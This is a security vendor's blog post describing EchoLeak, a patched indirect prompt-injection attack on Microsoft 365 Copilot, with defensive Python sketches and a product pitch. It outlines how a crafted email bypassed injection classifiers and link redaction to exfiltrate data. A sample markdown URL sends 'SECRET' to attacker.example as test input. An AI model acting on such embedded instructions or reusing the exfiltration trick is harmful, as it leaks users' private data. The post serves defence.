A newly disclosed vulnerability in Microsoft 365 Copilot, dubbed EchoLeak, is sending chills throughout the security community.

Discovered by Aim Labs, this exploit allows attackers to exfiltrate sensitive data from Copilot’s context window without phishing and with minimal user interaction.

The attack chain exploits what the researchers call an LLM Scope Violation. It manipulates the internal mechanics of large language models to bypass defenses against prompt injection, such as Microsoft’s cross-prompt injection attack (XPIA) classifiers.

The result? Sensitive and proprietary information can be silently extracted from Copilot, even though its interface is available only to internal users. All it takes is a single email containing nearly imperceptible instructions that trigger Copilot to extract sensitive information.

The researchers describe EchoLeak as a zero-click AI vulnerability. However, the attack only succeeds if the victim sends Copilot a prompt that matches the content of the attacker’s email, which makes user interaction a key component.

Microsoft quickly patched the vulnerability and stated that no customers were affected, but the implications are far-reaching. EchoLeak reveals a new class of threats that could have catastrophic consequences for unprotected organizations using AI copilots and agents.

How the attack works



The attack uses indirect prompt injection via a benign-looking email, bypassing Microsoft’s XPIA classifiers and link redaction filters through clever markdown formatting. It then leverages trusted domains like Microsoft Teams to bypass content security policies and send data to an attacker-controlled server.

To increase retrieval success, the attacker “sprays” the malicious payload across semantically varied email sections, ensuring Copilot pulls it into context.

The attack flow of EchoLeak. Source: Aim Security

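To make the markdown step more concrete, here is a minimal defensive sketch that scans an email body (or an AI response) for markdown links and images whose host is not on an allowlist. It assumes, for illustration, that a payload may hide its URL in a reference-style definition such as `[ref]: https://...` rather than in an inline `[text](url)` link. The allowlist, function name, and regexes are hypothetical simplifications, not how Microsoft’s link redaction or XPIA classifiers actually work.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist of hosts an organization treats as internal.
ALLOWED_HOSTS = {"contoso.sharepoint.com"}

# Simplified inline link or image without a title: [text](url) or ![alt](url)
INLINE_LINK = re.compile(r"!?\[[^\]]*\]\((\S+?)\)")

# Simplified reference-style definition on its own line: [ref]: url "optional title"
REF_DEFINITION = re.compile(
    r"^[ \t]{0,3}\[[^\]]+\]:[ \t]*<?(\S+?)>?(?:[ \t]+.*)?$", re.MULTILINE
)


def external_markdown_urls(body: str, allowed=ALLOWED_HOSTS) -> list[str]:
    """Return URLs from inline or reference-style markdown whose host is not allowlisted."""
    urls = INLINE_LINK.findall(body) + REF_DEFINITION.findall(body)
    flagged = []
    for url in urls:
        host = (urlparse(url).hostname or "").lower()
        # Relative links and schemes without a host (e.g. mailto:) are skipped.
        if host and host not in allowed:
            flagged.append(url)
    return flagged


body = (
    "Hi team,\n\n"
    "![logo][img]\n\n"
    "[img]: https://attacker.example/p.png?d=SECRET\n\n"
    "See [the wiki](https://contoso.sharepoint.com/wiki).\n"
)
print(external_markdown_urls(body))
```

Here the inline wiki link passes because its host is allowlisted, while the reference-style image definition is flagged. Because EchoLeak relayed data through trusted domains such as Microsoft Teams, a host allowlist on its own would not have been sufficient; a check like this narrows only one step of the chain.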

Securing AI starts with data security

EchoLeak validates what we’ve been saying at Varonis for years: AI is only as secure as the data it can access.

Copilots and agents are trained to be helpful, but when they’re over-permissioned, under-monitored, or manipulated by adversarial prompts like EchoLeak, they can become powerful tools for data exfiltration.

Most organizations rely on static discovery tools or native controls that lack the behavioral context and automation to detect AI-driven threats. They can’t see how data is used, who’s accessing it, or what’s changing, let alone detect when an AI agent is being manipulated.

In this case, EchoLeak could siphon off the user’s entire chat history and all files referenced in previous Copilot interactions. Organizations need to reduce their blast radius by limiting how much sensitive data AI can reference in the first place, while also monitoring for sensitive data typed into prompts or returned to users in responses.

As EchoLeak demonstrates, Copilot session history and previously referenced files can be a treasure trove. If a user’s identity is compromised, an attacker can access that information without needing a sophisticated prompt injection attack at all.

To truly keep critical information secure and enable AI in your organization, you must secure the data. And that’s where Varonis comes in.

How Varonis helps organizations safely use AI

With Varonis, CISOs wouldn’t have lost sleep if EchoLeak had gone unpatched. Our Data Security Platform (DSP) would have served as the last line of defense thanks to these capabilities:

Real-time visibility into AI activity

Varonis monitors every prompt, response, and data access event from Copilot and other AI agents. We can detect anomalous behavior, such as Copilot accessing sensitive data it has never touched before, and automatically lock down data before a breach occurs.
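The “never touched before” signal can be illustrated with a toy first-seen detector. This is a hypothetical sketch, not Varonis’s detection logic: the event fields, the class name, and the `sensitive` flag (standing in for a data classification label) are all assumptions, and a production behavioral model would weigh far more context than a single first-access rule.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class AccessEvent:
    identity: str    # a user, or an AI assistant acting on a user's behalf
    resource: str    # a file, mailbox item, site, etc.
    sensitive: bool  # hypothetical label from a data classifier


class FirstSeenSensitiveAccess:
    """Flag the first time an identity touches a sensitive resource after a baseline."""

    def __init__(self) -> None:
        # identity -> set of resources that identity has accessed so far
        self.seen: dict[str, set[str]] = defaultdict(set)

    def learn(self, event: AccessEvent) -> None:
        """Record baseline activity without raising alerts."""
        self.seen[event.identity].add(event.resource)

    def check(self, event: AccessEvent) -> bool:
        """Return True if this is a first-time access to a sensitive resource."""
        is_new = event.resource not in self.seen[event.identity]
        self.seen[event.identity].add(event.resource)
        return event.sensitive and is_new


detector = FirstSeenSensitiveAccess()
detector.learn(AccessEvent("copilot:alice", "q3-plan.docx", sensitive=True))
print(detector.check(AccessEvent("copilot:alice", "payroll.xlsx", sensitive=True)))
```

In this sketch, the baseline access to `q3-plan.docx` stays quiet on repeat, while the first sensitive access to `payroll.xlsx` is flagged once.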

Reducing your blast radius

An attack like EchoLeak can only exfiltrate data that the user can access. With Varonis, you can understand which copilot-enabled users and AI accounts can access your sensitive data. Our platform continuously enforces least privilege by revoking excessive access, fixing misconfigurations, and removing risky third-party apps. That means even if an attacker got in, there’d be far less information to steal.

AI-aware threat detection

Our UEBA models understand how both human and non-human identities interact with your data, so abnormal behavior is detected immediately. Varonis can flag unusual access patterns when an identity is compromised or when data exfiltration is attempted, and our Managed Data Detection & Response (MDDR) team can respond within minutes.

Protection beyond Copilot

EchoLeak is just the beginning. The AI attack surface is only growing. Varonis helps organizations secure the data that powers AI across Microsoft 365, Salesforce, and other cloud platforms.

End-to-end data security also extends beyond the traditional definition of a DSP. Your next AI backdoor attack could arrive through email, as it did in this instance, and the gap between XDR and DSP is shrinking.

AI-powered email security capabilities could have flagged the attacker’s message as external spam or graymail and archived or deleted it entirely. That would have mattered because, in EchoLeak, Copilot accesses the user’s primary mailbox, not the archive mailbox or the group, shared, and delegated mailboxes the user can open, and Copilot cannot reference or index deleted emails.

DLP and DSPM cannot stand alone. AI-ready organizations have a well-integrated defense strategy that includes elements of XDR like email security and ITDR, along with a comprehensive DSP with full visibility of data and data flows.

Recommendations

While the exploit has been patched, our security experts recommend that teams implement the principle of least privilege, because AI-related attacks are on the rise.

The principle of least privilege limits access so that users can surface only the data they absolutely need to do their jobs. For example, if a marketing employee fell victim, the attacker would be able to steal marketing plans but not financial information.
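The marketing example can be modeled in a few lines. This is a simplified sketch under stated assumptions: access is reduced to group membership, and the group names and documents are hypothetical. Real Microsoft 365 permissions also involve sharing links, inheritance, and direct grants. The point it shows is that an attacker operating through a compromised identity, or through a copilot acting as that identity, can surface only what that identity can reach.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Document:
    name: str
    allowed_groups: frozenset[str]  # hypothetical groups granted access


def blast_radius(user_groups: set[str], docs: list[Document]) -> list[str]:
    """Names of documents a compromised identity (or a copilot acting as it) could surface."""
    return [d.name for d in docs if d.allowed_groups & user_groups]


DOCS = [
    Document("marketing-plan.pptx", frozenset({"marketing"})),
    Document("q3-financials.xlsx", frozenset({"finance"})),
    Document("all-hands-notes.docx", frozenset({"everyone"})),
]

over_permissioned = {"marketing", "everyone", "finance"}  # excess finance access
least_privilege = {"marketing", "everyone"}

print(blast_radius(over_permissioned, DOCS))
print(blast_radius(least_privilege, DOCS))
```

Removing the unneeded `finance` membership takes the financial spreadsheet out of the compromised account’s reach without affecting the marketing work it actually needs.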


EchoLeak is a glimpse into the future of AI threats. Adopting a holistic approach to security is the only way to keep data safe. As the EchoLeak story develops, we will continue to update this blog post.

Ready to accelerate AI adoption with complete visibility and control?

Get started with a free Data Risk Assessment. In less than 24 hours, you’ll have a clear, risk-based view of the data that matters most and a clear path to automated remediation.

What should I do now?

Below are three ways you can continue your journey to reduce data risk at your company:

Schedule a demo with us to see Varonis in action. We'll personalize the session to your org's data security needs and answer any questions.

See a sample of our Data Risk Assessment and learn the risks that could be lingering in your environment. Varonis' DRA is completely free and offers a clear path to automated remediation.

Follow us on LinkedIn, YouTube, and X (Twitter) for bite-sized insights on all things data security, including DSPM, threat detection, AI security, and more.
